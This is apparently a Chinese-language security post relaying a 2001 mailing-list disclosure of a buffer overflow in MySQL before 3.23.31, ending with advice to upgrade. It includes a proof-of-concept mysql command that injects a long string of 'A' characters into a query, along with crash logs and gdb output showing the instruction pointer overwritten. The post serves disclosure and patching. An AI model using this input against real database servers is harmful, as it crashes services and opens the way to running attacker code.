MySQL3.23.31之前版本的安全漏洞

所有小于 3.23.31 版本的 MySQL 都存在一个缓冲溢出漏洞导致MySQL 崩溃。

使攻击者获得 mysqld 权限,而可以操纵所有数据库。攻击的前提是必须有一个合法的登录名和口令。

下面为最初发表于 MySQL 邮件列表的信件摘要。
==================================================
漏洞是由Jo?o Gouveia 于1月12日发现的:

步骤:

在第一个终端上启动 mysql:

spike:/var/mysql # /sbin/init.d/mysql start

在另外一个终端上输入:

jroberto@spike:~ > mysql -p -e ’select a.’`perl -e’printf("A"x130)’`’.b’

Enter password:

(没有反应?按^C退出)

在第一台终端上会显示:

  1. spike:/var/mysql # /usr/bin/safe_mysqld: line 149: 15557 Segmentation fault
  2. nohup
  3. $ledir/mysqld --basedir=$MY_BASEDIR_VERSION --datadir=$DATADIR --skip-lockin
  4. "$@" >>$err_log 2>&1>
  5. Number of processes running now: 0
  6. mysqld restarted on Fri Jan 12 07:10:54 WET 2001
  7. mysqld daemon ended

使用 gdb 显示结果如下:

  1. (gdb) run
  2. Starting program: /usr/sbin/mysqld
  3. [New Thread 16897 (manager thread)]
  4. [New Thread 16891 (initial thread)]
  5. [New Thread 16898]
  6. /usr/sbin/mysqld: ready for connections
  7. [New Thread 16916]
  8. [Switching to Thread 16916]
  9. Program received signal SIGSEGV, Segmentation fault.
  10. 0x41414141 in ?? ()
  11. (gdb) info all-registers
  12. eax 0x1 1
  13. ecx 0x68 104
  14. edx 0x8166947 135686471
  15. ebx 0x41414141 1094795585
  16. esp 0xbf5ff408 0xbf5ff408
  17. ebp 0x41414141 0x41414141
  18. esi 0x41414141 1094795585
  19. edi 0x0 0
  20. eip 0x41414141 0x41414141
  21. eflags 0x10246 66118
  22. cs 0x23 35
  23. ss 0x2b 43
  24. ds 0x2b 43
  25. es 0x2b 43
  26. fs 0x0 0
  27. gs 0x0 0

其中的 eip 指示就是缓冲溢出了。

解决办法就是升级到 3.23.31。

所以,各位如果还没有把数据库升级到最新版本,请赶快行动。

 

喜欢这篇文章吗?按个赞吧,不会令你失望!

发表评论